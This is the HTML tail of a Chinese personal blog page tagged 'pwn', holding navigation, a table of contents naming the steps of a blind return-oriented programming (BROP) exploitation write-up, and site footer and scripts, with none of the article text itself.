                                
                                    <li class="tag-item border-box">
                                        <i class="icon fas fa-hashtag"></i>&nbsp;<a href="/tags/pwn/">pwn</a>
                                    </li>
                                
                            </ul>
                        
                    </div>
                    <div>
                        
                    </div>
                </div>

                

                
                    <div class="post-nav border-box">
                        
                            <div class="prev-post">
                                <a class="prev"
                                   rel="prev"
                                   href="/2024/02/01/%E6%90%AD%E5%BB%BA%E8%BF%9C%E7%A8%8Bpwn%E7%8E%AF%E5%A2%83%E5%92%8Cubuntu%E6%97%A0%E6%B3%95gitclone%E7%9A%84%E9%97%AE%E9%A2%98/"
                                   title="搭建远程pwn环境和ubuntu无法gitclone的问题"
                                >
                                    <span class="left arrow-icon flex-center">
                                        <i class="fas fa-chevron-left"></i>
                                    </span>
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">搭建远程pwn环境和ubuntu无法gitclone的问题</span>
                                        <span class="post-nav-item">上一篇</span>
                                    </span>
                                </a>
                            </div>
                        
                        
                            <div class="next-post">
                                <a class="next"
                                   rel="next"
                                   href="/2024/01/29/ret2csu-level5/"
                                   title="ret2csu-level5"
                                >
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">ret2csu-level5</span>
                                        <span class="post-nav-item">下一篇</span>
                                    </span>
                                    <span class="right arrow-icon flex-center">
                                        <i class="fas fa-chevron-right"></i>
                                    </span>
                                </a>
                            </div>
                        
                    </div>
                

                
                    






                
            </div>
        </div>

        
            <div class="pc-post-toc right-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-%E7%A1%AE%E5%AE%9A%E6%A0%88%E6%BA%A2%E5%87%BA%E9%95%BF%E5%BA%A6"><span class="nav-text">1.确定栈溢出长度</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-%E5%AF%BB%E6%89%BE-stop-gadget"><span class="nav-text">2.寻找 stop gadget</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#3-%E8%8E%B7%E5%8F%96main%E7%9A%84%E5%9C%B0%E5%9D%80"><span class="nav-text">3.获取main的地址</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#4-%E8%AF%86%E5%88%AB-brop-gadget"><span class="nav-text">4.识别 brop gadget</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%86%85%E6%A0%B8%E6%8E%A5%E5%8F%A3"><span class="nav-text">内核接口</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E7%94%A8%E6%88%B7%E6%8E%A5%E5%8F%A3"><span class="nav-text">用户接口</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#5-%E7%A1%AE%E5%AE%9A-puts-plt-%E5%9C%B0%E5%9D%80"><span class="nav-text">5.确定 puts@plt 地址</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#6-dump%E5%86%85%E5%AD%98"><span class="nav-text">6.dump内存</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#7-%E6%B3%84%E9%9C%B2libc"><span class="nav-text">7.泄露libc</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#8-%E5%88%A9%E7%94%A8"><span class="nav-text">8.利用</span></a></li></ol>
    </div>
</div>

            </div>
        
    </div>
</div>


                
            </div>

        </div>

        <div class="page-main-content-bottom border-box">
            
<footer class="footer border-box">
    <div class="border-box website-info-box default">
        
            <div class="copyright-info info-item default">
                &copy;&nbsp;<span>2023</span>&nbsp;-&nbsp;2024
                
                    &nbsp;<i class="fas fa-heart icon-animate"></i>&nbsp;&nbsp;<a href="/">mango</a>
                
            </div>

            <div class="theme-info info-item default">
                由&nbsp;<a target="_blank" href="https://hexo.io">Hexo</a>&nbsp;驱动&nbsp;&&nbsp;主题&nbsp;<a class="keep-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep</a>
            </div>

            

            
        

        <div class="count-item info-item default">
            

            
                <span class="count-box border-box uv">
                    <span class="item-type border-box">访客数</span>
                    <span class="item-value border-box uv" id="busuanzi_value_site_uv"></span>
                </span>
            

            
                <span class="count-box border-box pv">
                    <span class="item-type border-box">访问量</span>
                    <span class="item-value border-box pv" id="busuanzi_value_site_pv"></span>
                </span>
            
        </div>
    </div>
</footer>

        </div>
    </div>

    <!-- post tools -->
    
        <div class="post-tools right-toc">
            <div class="post-tools-container border-box">
    <ul class="tools-list border-box">
        <!-- PC TOC show toggle -->
        
            <li class="tools-item flex-center toggle-show-toc">
                <i class="fas fa-list"></i>
            </li>
        

        <!-- PC go comment -->
        
    </ul>
</div>

        </div>
    

    <!-- side tools -->
    <div class="side-tools">
        <div class="side-tools-container border-box ">
    <ul class="side-tools-list side-tools-show-handle border-box">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <li class="tools-item tool-toggle-theme-mode flex-center">
            <i class="fas fa-moon"></i>
        </li>

        <!-- rss -->
        

        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list border-box">
        
            <li class="tools-item toggle-show-toc-tablet flex-center">
                <i class="fas fa-list"></i>
            </li>
        

        

        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>

        <li class="tools-item tool-scroll-to-top flex-center show-arrow">
            <i class="arrow fas fa-arrow-up"></i>
            <span class="percent"></span>
        </li>
    </ul>
</div>

    </div>

    <!-- image mask -->
    <div class="zoom-in-image-mask">
    <img class="zoom-in-image">
</div>


    <!-- local search -->
    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fas fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="搜索..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="close-popup-btn">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

    <!-- tablet toc -->
    
        <div class="tablet-post-toc-mask">
            <div class="tablet-post-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-%E7%A1%AE%E5%AE%9A%E6%A0%88%E6%BA%A2%E5%87%BA%E9%95%BF%E5%BA%A6"><span class="nav-text">1.确定栈溢出长度</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-%E5%AF%BB%E6%89%BE-stop-gadget"><span class="nav-text">2.寻找 stop gadget</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#3-%E8%8E%B7%E5%8F%96main%E7%9A%84%E5%9C%B0%E5%9D%80"><span class="nav-text">3.获取main的地址</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#4-%E8%AF%86%E5%88%AB-brop-gadget"><span class="nav-text">4.识别 brop gadget</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%86%85%E6%A0%B8%E6%8E%A5%E5%8F%A3"><span class="nav-text">内核接口</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E7%94%A8%E6%88%B7%E6%8E%A5%E5%8F%A3"><span class="nav-text">用户接口</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#5-%E7%A1%AE%E5%AE%9A-puts-plt-%E5%9C%B0%E5%9D%80"><span class="nav-text">5.确定 puts@plt 地址</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#6-dump%E5%86%85%E5%AD%98"><span class="nav-text">6.dump内存</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#7-%E6%B3%84%E9%9C%B2libc"><span class="nav-text">7.泄露libc</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#8-%E5%88%A9%E7%94%A8"><span class="nav-text">8.利用</span></a></li></ol>
    </div>
</div>

            </div>
        </div>
    
</main>



<!-- common -->

<script src="/js/utils.js"></script>

<script src="/js/header-shrink.js"></script>

<script src="/js/back2top.js"></script>

<script src="/js/toggle-theme.js"></script>

<script src="/js/code-block.js"></script>

<script src="/js/main.js"></script>

<script src="/js/libs/anime.min.js"></script>


<!-- local-search -->

    
<script src="/js/local-search.js"></script>



<!-- lazyload -->


<div class="">
    
        <!-- post-helper -->
        
<script src="/js/post/post-helper.js"></script>


        <!-- toc -->
        
            
<script src="/js/post/toc.js"></script>

        

        <!-- copyright-info -->
        

        <!-- share -->
        
    

    <!-- category-page -->
    

    <!-- links-page -->
    

    <!-- photos-page -->
    
</div>

<!-- mermaid -->


<!-- pjax -->



</body>
</html>
